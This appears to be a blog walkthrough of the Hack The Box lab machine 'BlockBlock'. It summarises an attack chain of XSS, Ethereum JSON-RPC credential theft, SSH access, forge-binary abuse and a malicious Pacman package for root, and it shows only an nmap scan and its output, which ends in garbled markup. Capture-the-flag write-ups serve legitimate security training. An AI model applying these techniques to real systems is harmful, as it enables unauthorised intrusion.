Hack The Box: BlockBlock Machine Walkthrough - Hard Difficulty

29 Mar, 2025

Hack The Box: BlockBlock Machine Walkthrough – Hard Difficulty

Hard Machine Authentication Bypass, BurpSuite, Challenges, Ethereum Classic Exploit, Forge Binary Privilege Escalation, HackTheBox, JSON-RPC Vulnerability, JWT Token Extraction, Linux, Pacman Package Manager Misconfiguration, Penetration Testing, ssh, XSS Attack

Reading Time: 13 minutes

Introduction to BlockBlock:

This walkthrough will explore the “BlockBlock” machine from Hack The Box, categorized as a hard-difficulty challenge. This guide will cover the reconnaissance, exploitation, and privilege escalation techniques used to capture user and root flags.

Objective for BlockBlock machine:

The goal of this walkthrough is to fully compromise the “BlockBlock” machine by obtaining both the user and root flags.

User Flag:

The first step was to gain initial access to the system by exploiting a web-based vulnerability. Through enumeration, an XSS vulnerability was discovered, allowing for the injection of a malicious JavaScript payload. This payload enabled interaction with the Ethereum JSON-RPC API, revealing stored credentials. By using these credentials, SSH access was successfully obtained, leading to the retrieval of the user flag. This step provided a crucial foothold in the system and set the stage for privilege escalation.

Root Flag:

After securing user access, we conducted further exploration, which revealed misconfigurations that could be exploited for privilege escalation. Specifically, we discovered that the forge binary had elevated execution privileges, allowing file manipulation to escalate access to a more privileged user (Paul). Additionally, further enumeration exposed a misconfiguration in the Pacman package manager. Consequently, we leveraged this by crafting a malicious package. Installing this package successfully granted root access to the system, leading to the final capture of the root flag. This stage highlights the importance of securing binaries and restricting package management privileges to prevent unauthorized escalation.

Enumerating the BlockBlock Machine

Reconnaissance:

Nmap Scan:

The first step was to conduct an Nmap scan to identify open ports and services:

nmap -sC -sV -oN nmap_initial.txt 10.10.11.43

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/blockblock]
└──╼ $nmap -sC -sV -oA initial 10.10.11.43
# Nmap 7.94SVN scan initiated Tue Mar 25 23:10:29 2025 as: nmap -sC -sV -oA initial 10.10.11.43
Nmap scan report for 10.10.11.43
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey: 
|   256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_  256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open  http    Werkzeug/3.0.3 Python/3.12.3
|_http-title:          Home  - DBLC    
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Tue, 25 Mar 2025 20:27:31 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 275864
|     Access-Control-Allow-Origin: http://0.0.0.0/
|     Access-Control-Allow-Headers: Content-Type,Authorization
|     Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
|     Connection: close
|     DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     Home - DBLC
|     </title>
|     <link rel="stylesheet" href="/assets/nav-bar.css">
|     </head>
|     <body>
|     -- <main> -->
|     <meta charset=utf-8>
|     <meta name=viewport content="width=device-width, initial-scale=1">
|     <style>
|     :after,
|     :before {
|     box-sizing: border-box;
|     border: 0 solid #e5e7eb
|     :after,
|     :before {
|     --tw-content: ""
|     :host,
|     html {
|     line-height: 1.5;
|   HTTPOptions: 
|     HTTP/1.1 500 INTERNAL SERVER ERROR
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Tue, 25 Mar 2025 20:27:31 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 265
|     Access-Control-Allow-Origin: http://0.0.0.0/
|     Access-Control-Allow-Headers: Content-Type,Authorization
|     Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
|     Connection: close
|     doctype html>
|     <html lang=en>
|     <title>500 Internal Server Error</title>
|     <h1>Internal Server Error</h1>
|_    The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=3/25%Time=67E3703C%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,3004,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.3\x
SF:20Python/3\.12\.3\r\nDate:\x20Tue,\x2025\x20Mar\x202025\x2020:27:31\x20
SF:GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\
SF:x20275864\r\nAccess-Control-Allow-Origin:\x20http://0\.0\.0\.0/\r\nAcce
SF:ss-Control-Allow-Headers:\x20Content-Type,Authorization\r\nAccess-Contr
SF:ol-Allow-Methods:\x20GET,POST,PUT,DELETE,OPTIONS\r\nConnection:\x20clos
SF:e\r\n\r\n\n\n\n\n\x20\x20\x20\x20</span><span style="color: #56B6C2">\</span></span>
<span class="line"><span style="color: #61AFEF">SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20Home\x20\x20-\x20DBLC\n\x20\x20\x2</span></span>
<span class="line"><span style="color: #61AFEF">SF:0\x20\n\x20\x20\x20\x20\"stylesheet\"\x20href=\"/a
SF:ssets/nav-bar\.css\">\n\n\n\n\x20\x20\x20\x20\n\n\x20\x20\
SF:x20\x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20
SF:20charset=utf-8>\n\x20\x20\x20\x20\"w
SF:idth=device-width,\x20initial-scale=1\">\n\x20\x20\x20\x20

Threatninja.net